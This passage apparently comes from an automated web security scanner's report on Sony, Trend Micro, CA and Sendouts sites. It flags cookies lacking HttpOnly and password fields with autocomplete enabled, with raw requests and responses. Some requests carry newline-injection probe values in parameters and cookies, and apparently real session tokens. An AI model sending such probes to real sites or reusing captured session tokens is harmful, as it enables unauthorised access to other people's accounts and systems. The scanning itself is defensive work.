Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.1.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10; mbox=session#1315352920400-736912#1315354842|PC#1315334914578-928682.19#1316562582|check#true#1315353042; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16167; ensUID=249118483jocCbfxsy2s; s_cc=true; s_visit=1; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Location: http://store.sony.com:80/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621
Content-Length: 0
Content-Type: text/html
Content-Language: en-US
Date: Tue, 06 Sep 2011 18:49:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS5bbf46=2877c4e6d661850e5150d0ea19ef0b38ff7b9fa6284bc12b4e666b3f; Path=/
Cache-Control: private


7.12. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SYSearchAjax

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/SYSearchAjax?keyword=xss&storeId=10151&langId=-1&catalogId=10551 HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
Cookie: CompareGrid=; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
ntCoent-Length: 811
Content-Type: text/html
Content-Language: en-US
Content-Length: 811
Date: Tue, 06 Sep 2011 18:58:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS5bbf46=2b9c93f9c1945f2c1cd8b18716b437e20bd7c268cce2babb4e666d6d; Path=/
Cache-Control: private


{"ResultSet": {
"suggestionList": [
{
"value": "XSS680CX",
"description": "Xpl%26%23333%3Bd%26trade%3B%20CX%20Series%20Speakers",
"img_url": "/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680C
...[SNIP]...

7.13. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=xss&x=0&y=0 HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
Cookie: CompareGrid=; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
ntCoent-Length: 109762
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 109762
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:58:55 GMT
Connection: close
Set-Cookie: TS5bbf46=eff63d3571683f04c37995dc222b8da043cb60bb051a376c4e666d6e; Path=/
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type
...[SNIP]...

7.14. https://store.trendmicro.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js HTTP/1.1
Host: store.trendmicro.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://store.trendmicro.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage
Cookie: __qca=P0-1207819931-1315351119372; bn_u=6923713920140458023; __utma=44797537.1048817980.1315351191.1315351191.1315351191.1; __utmz=44797537.1315351191.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; fsr.r={"d":90,"i":"1315351193052_377417","e":1315956018002}; __unam=e9c3bfd-132410b0872-607b674b-1; ORA_WX_SESSION=10.2.2.129:260-0#0; JSESSIONID=885803A57111A855BDA3F7D5608FCD0D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Thu, 02 Jun 2016 03:00:48 GMT
ETag: "80d-4891f577"
Content-Type: application/x-javascript
Last-Modified: Thu, 31 Jul 2008 17:25:11 GMT
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=7200+0;age=2440;ecid=105660496814,0)
Content-Length: 2061
Date: Thu, 02 Jun 2011 21:00:48 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app93
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc2pod9-pool1-active=1661075978.260.0000; path=/

var ptomodule={A:{},C:{},D:document,L:document.location,M:[],Q:{},T:new Date(),U:'',V:'2.7',Enabled:true,ST:"script",SA:
{"type":"text/javascript"},I:function(){var s=this.L.search;var c=this.D.cooki
...[SNIP]...

7.15. https://www.ca.com/siteminderagent/forms/login.fcc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /siteminderagent/forms/login.fcc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /siteminderagent/forms/login.fcc HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141
Content-Length: 3488
Cache-Control: max-age=0
Origin: https://www.ca.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351598983:ss=1315351389192

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJODc0ODU5MzQ3D2QWAgIBEGRkFghmD2QWDgIJDxYEHgRocmVmBSJodHRwOi8vd3d3LmNhLmNvbS91cy9wcm9kdWN0cy5hc3B4Hglpbm5lcmh0bWwFCHByb2R1Y3RzZAIKDxYEHwAFLmh0dHA6Ly
...[SNIP]...

Response

HTTP/1.1 302 Object Moved
Cache-control: no-store
Location: /register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d
Content-Length: 0
set-cookie: target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; path=/; domain=.ca.com
set-cookie: SMTRYNO=1; path=/; domain=.ca.com


7.16. https://www.ca.com/us/register/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:23:42 GMT
Content-Length: 36056


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...

8. Password field with autocomplete enabled  previous  next
There are 9 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


8.1. http://webconnect.sendouts.com/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://webconnect.sendouts.com
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= HTTP/1.1
Host: webconnect.sendouts.com
Proxy-Connection: keep-alive
Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml"
Date: Tue, 06 Sep 2011 20:31:59 GMT
Content-Length: 6707


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LogIn</title
...[SNIP]...
<body>

<form name="WebForm1" method="post" action="login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&amp;ID=cfs&amp;SiteID=WebConnect&amp;Group=cfs&amp;Key=CN&amp;CnId=" onsubmit="javascript:return WebForm_OnSubmit();" id="WebForm1">
<div>
...[SNIP]...
<br />
                               <input name="txtPassword" type="password" id="txtPassword" /><span id="RequiredFieldValidator2" class="ErrorMsg" style="color:Red;display:none;">
...[SNIP]...

8.2. https://www.ca.com/us/register/createprofile.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/createprofile.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /us/register/createprofile.aspx?returnURL=/us/default.aspx HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351461237:ss=1315351389192

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:25:47 GMT
Content-Length: 458334


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<scri
...[SNIP]...
<body>
<form name="mainForm" method="post" action="/us/register/createprofile.aspx?returnURL=/us/default.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm">
<div>
...[SNIP]...
<div class="formitemfield">
<input name="txtPsw" type="password" id="txtPsw" maxlength="32" class="small formfieldwidth2 hastip" />
<div class="formtip2 blue small">
...[SNIP]...
<div class="formitemfield">
<input name="txtPswConf" type="password" id="txtPswConf" maxlength="32" class="small formfieldwidth2 hastip" />
<div class="formtip2 small">
...[SNIP]...

8.3. https://www.ca.com/us/register/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /us/register/login.aspx?returnURL=/us/default.aspx HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351389192:ss=1315351389192; bn_u=6923713924586392201

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:23:48 GMT
Content-Length: 35650


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...
<body onload="getFocus();">

<form name="mainForm" method="post" action="/us/register/login.aspx?returnURL=/us/default.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm">
<div>
...[SNIP]...
<div class="formitemfield">
<input name="PASSWORD" type="password" id="PASSWORD" class="small hastip formfieldwidth2" />
<div class="formtip2 blue small">
...[SNIP]...

8.4. https://www.ca.com/us/register/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
